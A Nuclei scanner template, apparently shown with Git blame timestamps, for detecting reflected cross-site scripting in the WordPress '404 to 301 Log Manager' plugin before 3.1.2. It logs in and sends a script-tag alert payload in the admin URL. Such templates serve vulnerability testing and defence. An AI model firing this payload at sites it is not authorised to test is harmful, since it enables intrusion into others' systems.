2022-07-06 10:46:17 +00:00
id : 404 -to-301-xss
info :
2022-09-08 13:28:46 +00:00
name : WordPress 404 to 301 Log Manager <3.1.2 - Cross-Site Scripting
2022-07-06 10:46:17 +00:00
author : Akincibor
severity : medium
2022-09-08 13:28:46 +00:00
description : WordPress 404 to 301 Log Manager 3.1.2 does not escape some URLs before outputting them back in attributes, leading to reflected cross-site scripting.
2022-07-06 10:46:17 +00:00
reference :
- https://wpscan.com/vulnerability/4a310b4f-79fa-4b74-93f8-e4522921abe1
- https://wordpress.org/plugins/404-to-301
2022-09-08 13:28:46 +00:00
classification :
2023-03-03 15:27:54 +00:00
cvss-metrics : CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N
cvss-score : 5.4
cwe-id : CWE-80
2022-08-27 04:41:18 +00:00
tags : wpscan,wp-plugin,xss,wp,wordpress,authenticated
2023-04-28 08:11:21 +00:00
metadata :
max-request : 2
2022-07-06 10:46:17 +00:00
2023-04-27 04:28:59 +00:00
http :
2022-07-06 10:46:17 +00:00
- raw :
- |
POST /wp-login.php HTTP/1.1
Host : {{Hostname}}
Origin : {{RootURL}}
Content-Type : application/x-www-form-urlencoded
Cookie : wordpress_test_cookie=WP%20Cookie%20check
log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1
- |
GET /wp-admin/admin.php?page=jj4t3-logs&a"><script>alert(1)</script> HTTP/1.1
Host : {{Hostname}}
cookie-reuse : true
matchers-condition : and
matchers :
- type : word
part : body
words :
- '"><script>alert(1)</script>'
- '404 Error Logs'
condition : and
- type : word
part : header
words :
- text/html
- type : status
status :
- 200